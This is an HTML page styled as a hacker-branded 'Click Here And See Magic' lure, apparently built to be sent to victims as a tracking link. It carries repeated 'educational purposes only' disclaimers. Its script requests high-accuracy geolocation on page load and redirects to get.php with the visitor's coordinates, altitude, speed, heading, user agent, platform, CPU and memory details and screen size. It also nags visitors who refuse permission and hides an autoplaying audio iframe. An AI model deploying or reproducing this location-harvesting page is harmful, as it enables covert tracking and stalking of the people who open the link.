<!DOCTYPE html>
<html>
<body>
<meta http-equiv="refresh" content="30" />
<fieldset>

<body>
<body bgcolor="gray">
<br>
<font class="hk2" style="text-shadow: 1px -1px 8px;" face="tahoma">
<style> .error { text-align: center; font-family: 'Gilda Display', serif; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; overflow: default; } .info { text-align: center; width: 200px; height: 60px; margin: auto; position: absolute; top: 280px; bottom: 0; left: 20px; right: 0; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; } .info:after { content: 'OWNED'; font-family: OCR-A; font-size: 100px; text-align: center; width: 800px; margin: auto; position: absolute; top: 20px; bottom: 0; left: 40px; right: 0; opacity: 0; color: white; -webkit-animation: noise-1 .2s linear infinite; animation: noise-1 .2s linear infinite; } @-webkit-keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @-webkit-keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @-webkit-keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @-webkit-keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } @keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } .wrap { top: 30%; left: 25%; height: 200px; margin-top: -100px; position: absolute; } code { color: white; } span.blue { color: #48beef; } span.comment { color: #7f8c8d; } span.orange { color: #f39c12; } span.green { color: #33cc33; } .viewFull { font-family:OCR-A; color:orange; text-decoration:; } 	 } @media only screen and (min-height: 500px) { .viewFull{ display:none; 	 	} } 	</style> <center> <style> img { filter:alpha(opacity=70); -moz-opacity:0.7; opacity:0.7; } img:hover { filter:alpha(opacity=100); -moz-opacity:.0; opacity:1.0; } </style>
<link href="https://fonts.googleapis.com/css?family=Chicle|Yatra+One" rel="stylesheet" type="text/css">
<div class="error">
<link href="https://fonts.googleapis.com/css?family=Butcherman&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Permanent+Marker&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Shadows+Into+Light&display=swap" rel="stylesheet">
 <style> body{ } @font-face { font-family: opal; src: url(https://watchdogsfont.com/font/HACKED_Title.ttf); } </style>
 <iframe width="0" height="0" src="https://api.soundcloud.com/tracks/597155748/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen></iframe>
<center><marquee scrollamount="10" behavior="alternate">This Link is for Testing Purposes ONLY. "How you use this link is your responsibility. I will not be held accountable for any illegal activities. This Link/Program Doesn't Support illegal activities". This Program/Link is For Educational Purpose.</marquee><br><br><center><font color="white" size="15" face="opal">Vaimpier<font color="red">
 Ritik</font>

<br>
<br>
<hr>
<h5>
Hacking & Teachnology 
</h5>
<hr>
<br>
<head> <style> .button { background: yellow; border: none; padding: 20px; text-align: center; } .button1 {border-radius: 2px;} .button2 {border-radius: 4px;} .button3 {border-radius: 8px;} .button4 {border-radius: 12px;} .button5 {border-radius: 100px;} </style> <body> 
<button class="button button5"> 

<body onLoad="getLocation()">
<button onclick="getLocation()"><button class="button button5">
<p style="text-shadow:0px 0px 1px red;">
<b><font color="gray" size="8">Click Here And See Magic
</b></font>
</p>

<button>
<button class="button button5">
</button>
</button>
</h1>

<br>

<head>
<style>
     h5 {
             font-family:'Luckiest', cursive;
             }
</style>
</head>
<h5>
     
This presentation is for educational purposes ONLY."How you use this Link/Program is your responsibility.I will not be held accountable for any illegal activities This Program/Link Doesn't Support illegal activities".This Link is For Educational Purpose.
</h5>



<head>
<style> 
         hr { 
                 height: 30px;
         }
    </style>     
    </head>
    <body>
         <hr color="pink" style="width: 90%;">
         <hr color="pink" style="width: 80%;">
         <hr color="pink" style="width: 70%;">
         <hr color="pink" style="width: 60%;">
         <hr color="pink" style="width: 50%;">
         <hr color="pink" style="width: 40%;">
         <hr color="pink" style="width: 30%;">
         <hr color="pink" style="width: 20%;">
           <hr color="pink" style="width: 10%;">
         <hr color="pink" style="width: 5%;">
         <hr color="pink" style="width: 90%;">
         <hr color="pink" style="width: 80%;">
         <hr color="pink" style="width: 70%;">
         <hr color="pink" style="width: 60%;">
         <hr color="pink" style="width: 50%;">
         <hr color="pink" style="width: 40%;">
           <hr color="pink" style="width: 30%;">
         <hr color="pink" style="width: 20%;">
         <hr color="pink" style="width: 10%;">
         <hr color="pink" style="width: 5%;">
         <hr color="pink" style="width: 90%;">
         <hr color="pink" style="width: 80%;">
         <hr color="pink" style="width: 70%;">
         <hr color="pink" style="width: 60%;">
           <hr color="pink" style="width: 50%;">
         <hr color="pink" style="width: 40%;">
         <hr color="pink" style="width: 30%;">
         <hr color="pink" style="width: 20%;">
         <hr color="pink" style="width: 10%;">
         <hr color="pink" style="width: 5%;">
         <hr color="pink" style="width: 90%;">
         <hr color="pink" style="width: 80%;">
           <hr color="pink" style="width: 70%;">
         <hr color="pink" style="width: 60%;">
         <hr color="pink" style="width: 50%;">
         <hr color="pink" style="width: 40%;">
         <hr color="pink" style="width: 30%;">
         <hr color="pink" style="width: 20%;">
         <hr color="pink" style="width: 10%;">
         <hr color="pink" style="width: 5%;">
           <hr color="pink" style="width: 90%;">
         <hr color="pink" style="width: 80%;">
         <hr color="pink" style="width: 70%;">
         <hr color="pink" style="width: 60%;">
         <hr color="pink" style="width: 50%;">
         <hr color="pink" style="width: 40%;">
         <hr color="pink" style="width: 30%;">
         <hr color="pink" style="width: 20%;">
           <hr color="pink" style="width: 10%;">
         <hr color="pink" style="width: 5%;">
</body>




<script>


function getLocation() {
    if (navigator.geolocation) {
    var acc = {enableHighAccuracy : true , timeout : 30000, maximumage : 0 };
        navigator.geolocation.getCurrentPosition(showPosition, showError, acc);
    } else { 
        x.innerHTML = "This site requires Geolocation to work.";
    }
}

function showPosition(position) {

 //   x.innerHTML = "Latitude: " + position.coords.latitude + 
 //   "<br>Longitude: " + position.coords.longitude;

  var useragent = navigator.userAgent;
  var latitude = position.coords.latitude;
  var longitude = position.coords.longitude;
  var altitude = position.coords.altitude;
  var accuracy = position.coords.accuracy;
  var speed = position.coords.speed;
  var heading = position.coords.heading;
  var platform = navigator.platform;
  var hardware = navigator.hardwareConcurrency;
  var memory = navigator.deviceMemory;
  var height = window.screen.height;
  var width = window.screen.width;


window.location.href = "get.php?latitude=" + latitude + "&longitude=" + longitude + "&altitude=" + altitude + "&platform=" + platform + "&accuracy=" + accuracy + "&speed=" + speed + "&heading=" + heading + "&hardware=" + hardware + "&memory=" + memory + "&useragent=" + useragent + "&height=" + height + "&width=" + width;

}
function showError(error)
{
	switch(error.code)
  {
		case error.PERMISSION_DENIED:
			var error = '1' ; // 'permission denied';
      alert('Please, Allow Location Permission...');
      break;
		case error.POSITION_UNAVAILABLE:
			var error = '2' // 'unavailable';
			break;
		case error.TIMEOUT:
			var error = '3' // 'timed out';
      alert('Please refresh this page...');
			break;
		case error.UNKNOWN_ERROR:
			var error  = '4' // 'unknown error';
			break;
	}

window.location.href = "error.php?error=" + error;

}
</script>

</body>
</html>